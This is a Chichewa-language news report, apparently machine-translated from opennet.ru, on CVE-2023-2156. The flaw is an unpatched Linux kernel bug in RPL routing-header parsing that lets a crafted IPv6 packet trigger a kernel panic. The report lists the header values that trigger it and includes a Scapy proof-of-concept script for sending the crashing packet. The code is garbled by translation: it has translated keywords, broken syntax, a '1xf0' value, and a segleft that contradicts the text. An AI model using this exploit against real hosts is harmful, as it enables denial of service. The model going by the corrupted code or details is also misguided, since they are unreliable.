Zambiri zawululidwa za kusatetezeka kosasinthika (0-day) (CVE-2023-2156) mu Linux kernel, zomwe zimalola kuyimitsa kachitidweko potumiza mapaketi opangidwa mwapadera a IPv6 (paketi-yakufa). Vutoli limangowonekera pamene kuthandizira kwa protocol ya RPL (Routing Protocol for Low-Power and Lossy Networks) yathandizidwa, yomwe imayimitsidwa mwachisawawa pogawira ndipo imagwiritsidwa ntchito makamaka pazida zophatikizidwa zomwe zimagwira ntchito muzitsulo zopanda zingwe zomwe zimatayika kwambiri.
Chiwopsezocho chimayamba chifukwa chakusintha kolakwika kwa data yakunja mu code ya RPL protocol parsing code, zomwe zimadzetsa kulephera kwamphamvu komanso kernel kupita ku mantha. Mukayika zomwe mwapeza poyika mutu wa paketi ya IPv6 RPL mu k_buff (Socket Buffer), ngati gawo la CmprI lakhazikitsidwa ku 15, gawo la Segleft kukhala 1, ndi CmprE mpaka 0, 48-byte vector yokhala ndi ma adilesi imatsitsidwa. mpaka 528 bytes ndikuwoneka ngati kukumbukira komwe kumaperekedwa kwa buffer sikukwanira. Pachifukwa ichi, ntchito ya skb_push, yomwe imagwiritsidwa ntchito kukankhira deta mu dongosolo, imayang'ana zosagwirizana pakati pa kukula kwa deta ndi buffer, kutulutsa mantha kuti ateteze kulemba kupyola malire a buffer.
Chitsanzo: # Tidzagwiritsa ntchito Scapy kupanga paketi kuchokera ku scapy.all import * import socket # Gwiritsani IPv6 kuchokera ku LAN mawonekedwe DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Timagwiritsa ntchito socket kutumiza paketi sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Pangani paketi # Type = 3 imapanga paketi ya RPL # Maadiresi ali ndi maadiresi 3, koma chifukwa CmprI ndi 15, # octet iliyonse mwa maadiresi awiri oyambirira ndi kuchitidwa ngati adilesi yoponderezedwa # Segleft = 1 kuyambitsa kukulitsa # lastentry = 0xf0 imayika CmprI ku 15 ndi CmprE mpaka 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(mtundu = 3, maadiresi:= :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Tumizani paketi yoyipayi sockfd.sendto(bytes(p), (DST_ADDR, 0))
Ndizofunikira kudziwa kuti opanga kernel adadziwitsidwa zachiwopsezocho mu Januware 2022 ndipo m'miyezi 15 yapitayi ayesa kukonza vutoli katatu, ndikutulutsa zigamba mu Seputembara 2022, Okutobala 2022 ndi Epulo 2023, koma nthawi iliyonse zokonza zidachitika. osakwanira ndipo kusatetezeka sikunathe kubwerezedwanso. Pamapeto pake, pulojekiti ya ZDI, yomwe idagwirizanitsa ntchitoyo kuti ikonze chiwopsezocho, idaganiza zotulutsa zambiri zokhudzana ndi chiwopsezocho popanda kudikirira kuti ntchito ipezeke mu kernel.
Chifukwa chake, chiwopsezocho chimakhalabe chosakhazikika. Makamaka, chigamba chomwe chikuphatikizidwa mu 6.4-rc2 kernel sichigwira ntchito. Ogwiritsa ntchito akulangizidwa kuti ayang'ane kuti ndondomeko ya RPL sikugwiritsidwa ntchito pa machitidwe awo, zomwe zingatheke pogwiritsa ntchito lamulo sysctl -a | grep -i rpl_seg_enabled
Source: opennet.ru